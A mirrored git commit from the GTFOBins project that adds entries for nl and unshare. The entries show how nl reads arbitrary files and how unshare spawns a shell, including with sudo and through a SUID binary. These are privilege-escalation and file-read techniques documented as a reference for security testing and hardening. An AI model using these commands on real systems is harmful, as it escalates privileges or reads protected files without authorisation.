mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add xargs, nl and unshare
This commit is contained in:
commit
bb001f1b8a
8
_gtfobins/nl.md
Normal file
8
_gtfobins/nl.md
Normal file
@ -0,0 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- description: This prepends a leading space to each line.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
---
|
9
_gtfobins/unshare.md
Normal file
9
_gtfobins/unshare.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: unshare /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo unshare /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./unshare -r /bin/sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user